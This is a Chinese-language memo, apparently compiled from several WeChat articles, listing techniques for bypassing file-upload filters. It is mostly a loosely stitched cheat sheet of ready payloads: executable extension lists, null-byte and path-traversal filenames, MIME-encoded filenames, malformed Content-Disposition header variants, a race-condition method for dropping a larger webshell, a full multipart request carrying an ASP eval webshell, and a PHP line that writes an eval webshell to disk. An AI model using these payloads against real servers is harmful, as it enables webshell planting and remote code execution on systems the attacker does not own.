【备忘录】文件上传绕过小技巧总结

后缀名检测绕过MIME类型检测与绕过文件内容检测与绕过00截断绕过条件竞争检测与绕过

https://mp.weixin.qq.com/s/COLw_Edxst-lZsi8MhL6kA

取=后的两个两个十六进制数字，并将其转换为ascii码值对应的字符。所以MIME编码的格式为=?charset?encoding?encoded text?=下面是对这个格式的详细解释：=?：编码的起始标记，表示编码的开始。charset：表示字符集，即非ASCII字符所使用的字符编码集。这通常是一个标识字符集的文本字符串，例如UTF-8或ISO-8859-1。encoding：表示编码方式，即用于将字符编码为ASCII字符的具体方法。常见的编码方式包括"Q"和"B"。"Q"表示Quoted-Printable编码，它将非ASCII字符编码为"="后跟两个十六进制数字的形式。"B"表示Base64编码，它将数据编码为一系列ASCII字符。encoded text：是实际编码后的文本，即包含非ASCII字符的原始文本的编码版本。?=：编码的结束标记，表示编码的结束。举例：将shell.jsp通过Quoted-Printable编码方式为=?utf-8?Q?=73=68=65=6c=6c=2e=6a=73=70?=将shell.jsp通过Base64编码方式为=?utf-8?B?c2hlbGwuanNw?=

 文件上传不回显 确认上传成功之后，遍历目录+上传文件名，文件名不变的情况 查看存在的图片地址，优先遍历 以上寻找文件的方法需要的前提：文件名不变，字典路径足够多 1.目录没有执行权限（通过控制文件名进行../../跳目录，跳到可以执行脚本语言的目录） 2.上传文件找不到路径（通过控制文件名进行../../跳目录，层级跳到根目录进行访问） 3.上传白名单截断 （有些文件上传处是白名单，后缀名不可以绕，可以利用控制文件名截断的方式去绕过白名单，例如1.jsp%00.jpg）

 利用跳目录 因为文件名可以控制，我们就可以利用../跳目录的方式去截断代码本身给添加的前置名 举例： 上传1.txt，代码会自动添加xxxx_xxxx_20_1.txt 这里的利用思路就是上传配合解析的配置文件，例如上传.htaccess配合解析，当然这里实战应用的场景还有很多，只是提供一个思路 Content-Disposition: form-data; name="url"; filename="///....111.txt"

 .php .php2 .php3 .php4 .php5 .php6 .php7 .phps .phps .pht .phtm .phtml .pgif .shtml .htaccess .phar .inc .hphp .ctp .module

 .asp .aspx .config .ashx .asmx .aspq .axd .cshtm .cshtml .rem .soap .vbhtm .vbhtml .asa .cer .shtml

 .jsp .jspx .jsw .jsv .jspf

 Coldfusion：.cfm   .cfml   .cfc  .dbm Perl：.pl       .cgi 随机大小写变换：.pHp  .pHP5   .PhAr

 file.png.php file.png.Php5 file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php. file. file.php.... file.pHp5.... file.png.php file.png.pHp5 file.php#.png file.php%00.png file.phpx00.png file.php%0a.png file.php%0d%0a.png file.phpJunk123png file.png.jpg.php file.php%00.png%00.jpg

 可以利用上传时候的代码执行的需要一定的时间，加大客户端请求时候的并发，造成文件上传时候条件竞争。 准备好webshell，这个webshell的功能要能写一个大马到webapp根目录下，然后我们访问这个大马。 先开两个intruder，然后请求上传的文件的并发开到100。 访问大马的地址，检查是否创建成功。

https://mp.weixin.qq.com/s/BLjfhMNkiTuSiIB9ZKAb2Qhttps://mp.weixin.qq.com/s/FW93imGul0kNxbi2RhXBfA

 第一种： Content-Disposition: form-data; name="file"; filename="1.p hp" 第二种： Content-Disposition: form-data; name="file"; file name="1.php" 第三种： Content-Disposition: form-data; name="file"; filename= "1.php" 三种均可

Content-Disposition: form-data; name="file"; filename==="a.php"

 Content-Disposition: form-data; aaaaaaaaaaaaaaaaaaaaa......aaaaaaaaaaaaaaaaaaaaa;name="file"; filename="a.php"

 第一种： Content-Disposition: form-data; name=file1; filename=a.php 第二种： Content-Disposition: form-data; name='file1'; filename="a.php"

 Content-Disposition: form-data; name="file"; filename= ; filename="a.php"

 Content-Disposition: name="file"; filename="a.php" 去除form-data Content-Disposition: AAAAAAAA="BBBBBBBB"; name="file"; filename="a.php" 替换form-data为垃圾值 Content-Disposition: form-data   ; name="file"; filename="a.php" form-data后加空格 Content-Disposition: for+m-data; name="file"; filename="a.php" form-data中加+

COntEnT-DIsposiTiOn: form-data; name="file"; filename="a.php" 大小写混淆 Content-Type: image/gif Content-Disposition: form-data; name="file"; filename="a.php" 调换Content-Type和ConTent-Disposition的顺序 Content-Type: image/gif Content-Disposition: form-data; name="file"; filename="a.php" Content-Type: image/gif 增加额外的头 AAAAAAAA:filename="aaa.jpg"; Content-Disposition: form-data; name="file"; filename="a.php" Content-Type: image/gif 增加额外的头 Content-Length: 666 Content-Disposition: form-data; name="file"; filename="a.php" Content-Type: image/gif 增加额外的头

Content-Type: multipart/form-data; boundary=---------------------------471****1141173****525****99 Content-Length: 253 -----------------------------471****1141173****525****99 Content-Disposition: form-data; name="file1"; filename="shell.asp" Content-Type: application/octet-stream <%eval request("a")%> -----------------------------471****1141173****525****99--

 fputs(fopen('shell6666.php','w'),'<?php @eval($_POST[1])?>');